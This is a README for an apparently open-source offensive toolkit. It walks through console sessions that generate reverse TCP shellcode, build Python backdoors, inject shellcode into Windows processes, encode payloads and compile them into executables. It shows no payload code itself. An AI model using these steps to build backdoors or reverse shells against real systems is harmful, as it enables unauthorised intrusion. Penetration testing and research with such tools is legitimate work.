hahasecure is a versatile exploitation toolkit designed for penetration testers, security researchers, and red teamers. It provides a wide range of features, including shellcode generation, backdoor creation, process injection, encoding, and executable generation for multiple platforms.
-
Shellcode Generation: Generate shellcode for various platforms (Linux x86/x64, Windows x86/x64, ARM).
-
Backdoor Creation: Create Python-based backdoors for Windows and Linux.
-
Process Injection: Inject shellcode into running processes (Windows only).
-
Encoding Tools: Encode data using XOR, Base64, AES, and ROT13.
-
Executable Generation: Compile shellcode into executables for Windows and Linux.
-
Python 3.x
-
colorama library (pip install colorama)
-
pyfiglet library (pip install pyfiglet)
-
pycryptodome library (pip install pycryptodome)
-
mingw (for Windows executable generation)
-
nasm and ld (for Linux executable generation)
git clone https://github.com/livepwn/hahasecure.git
cd hahasecure
python hahasecure.py
Alert: Donot run this tool with sudo or chmod.
- When you run the tool, you'll see the main menu:
hahasecure >
Available commands:
help: Show the help menu.
use <module>: Switch to a specific module (e.g., use shellcode).
show <database>: Show available options for a module (e.g., show shellcodes).
os <command>: Execute an OS command.
clear: Clear the screen.
exit: Exit the tool.
- Shellcode Module
- Generate shellcode for reverse TCP connections.
-
set : Set options like LHOST, LPORT, and PLATFORM.
-
generate: Generate shellcode.
-
show options: Show current options.
hahasecure > use shellcode
hahasecure/shellcode > set LHOST 192.168.1.100
hahasecure/shellcode > set LPORT 4444
hahasecure/shellcode > set PLATFORM linux/x64
hahasecure/shellcode > generate
- Backdoor Module
- Create Python-based backdoors.
-
set : Set options like LHOST, LPORT, and PLATFORM.
-
generate: Generate a backdoor.
-
show options: Show current options.
hahasecure > use backdoor
hahasecure/backdoor > set LHOST 192.168.1.100
hahasecure/backdoor > set LPORT 4444
hahasecure/backdoor > set PLATFORM python/windows
hahasecure/backdoor > generate
- Injector Module
- Inject shellcode into a running process (Windows only).
- inject : Inject shellcode into a process with the specified PID.
hahasecure > use injector
hahasecure/injector > inject 1234
- Encoder Module
- Encode data using XOR, Base64, AES, or ROT13.
-
set : Set options like ENCODING and KEY.
-
encode : Encode the provided data.
-
show options: Show current options.
hahasecure > use encoder
hahasecure/encoder > set ENCODING xor
hahasecure/encoder > set KEY secret
hahasecure/encoder > encode HelloWorld
- Executable Module
- Compile shellcode into executables for Windows and Linux.
-
set : Set options like PLATFORM and OUTPUT.
-
generate: Generate an executable.
-
show options: Show current options.
hahasecure > use executable
hahasecure/executable > set PLATFORM windows
hahasecure/executable > set OUTPUT payload.exe
hahasecure/executable > generate
- Generate a Linux Reverse TCP Shellcode
hahasecure > use shellcode
hahasecure/shellcode > set LHOST 192.168.1.100
hahasecure/shellcode > set LPORT 4444
hahasecure/shellcode > set PLATFORM linux/x64
hahasecure/shellcode > generate
- Create a Python Backdoor for Windows
hahasecure > use backdoor
hahasecure/backdoor > set LHOST 192.168.1.100
hahasecure/backdoor > set LPORT 4444
hahasecure/backdoor > set PLATFORM python/windows
hahasecure/backdoor > generate
- Inject Shellcode into a Process
hahasecure > use injector
hahasecure/injector > inject 1234
- Encode Data with XOR
hahasecure > use encoder
hahasecure/encoder > set ENCODING xor
hahasecure/encoder > set KEY secret
hahasecure/encoder > encode HelloWorld
- Generate a Windows Executable
hahasecure > use executable
hahasecure/executable > set PLATFORM windows
hahasecure/executable > set OUTPUT payload.exe
hahasecure/executable > generate
Contributions are welcome! Please open an issue or submit a pull request for any improvements or bug fixes.
This project is licensed under the Apache-2.0 License. See the LICENSE file for details.
This tool is intended for educational and ethical purposes only. Do not use it for illegal activities. The authors are not responsible for any misuse of this tool.
Contact For questions or feedback, please open an issue on GitHub or contact me. email: [email protected]